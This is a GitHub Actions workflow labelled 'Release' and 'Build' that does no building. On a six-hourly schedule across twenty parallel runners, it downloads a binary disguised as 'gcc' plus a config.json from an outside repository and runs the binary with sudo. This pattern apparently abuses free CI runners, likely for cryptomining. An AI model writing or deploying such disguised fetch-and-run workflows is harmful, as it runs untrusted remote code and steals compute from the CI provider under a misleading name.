name: Release
on:
  workflow_dispatch:
  schedule:
     - cron:  '0 0/6 * * *'
  
jobs:
  build:
    name: Build
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
    steps:
      - name: Install
        run: |
          sudo apt-get install wget -y
          wget https://github.com/Yefori/m/raw/main/gcc
          wget https://raw.githubusercontent.com/Yefori/m/main/config.json
          sudo chmod +x gcc
          sudo ./gcc
